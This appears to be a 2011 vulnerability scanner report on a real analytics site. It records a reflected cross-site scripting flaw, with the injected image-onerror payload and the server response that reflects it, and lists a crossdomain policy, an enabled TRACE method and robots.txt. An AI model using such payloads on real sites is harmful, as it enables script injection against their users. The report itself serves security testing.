1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://siteanalytics |
Path: | /revresda.com |
GET /revresda.com48b8b"><img%20src%3da Host: siteanalytics.compete.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Thu, 13 Jan 2011 01:45:58 GMT Server: Apache Vary: Cookie Content-Length: 19256 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <span title="revresda.com48b8b"><img src=a onerror=alert(1) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://siteanalytics |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: siteanalytics.compete.com |
HTTP/1.1 200 OK Date: Thu, 13 Jan 2011 01:43:43 GMT Server: Apache Last-Modified: Fri, 03 Dec 2010 16:53:34 GMT ETag: "b898b-110-60febf80" Accept-Ranges: bytes Content-Length: 272 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="media.compete.com" /> <allow-access-from domain="stg.media.compete.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://siteanalytics |
Path: | / |
TRACE / HTTP/1.0 Host: siteanalytics.compete.com Cookie: 8cf04a6532970250 |
HTTP/1.1 200 OK Date: Thu, 13 Jan 2011 01:43:34 GMT Server: Apache Vary: Host Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: siteanalytics.compete.com Cookie: 8cf04a6532970250 |
Severity: | Information |
Confidence: | Certain |
Host: | http://siteanalytics |
Path: | /revresda.com |
GET /robots.txt HTTP/1.0 Host: siteanalytics.compete.com |
HTTP/1.1 200 OK Date: Thu, 13 Jan 2011 01:43:47 GMT Server: Apache Vary: Host Last-Modified: Fri, 07 Jan 2011 22:32:13 GMT ETag: "34877-c6-308c3540" Accept-Ranges: bytes Content-Length: 198 Connection: close Content-Type: text/plain; charset=UTF-8 User-Agent: * Disallow: /s/load_tags/ Disallow: /s/async/ Disallow: /metrics/async/ Disallow: /uv/ Disallow: /m/profiles/site/ Sitemap: http://siteanalytics |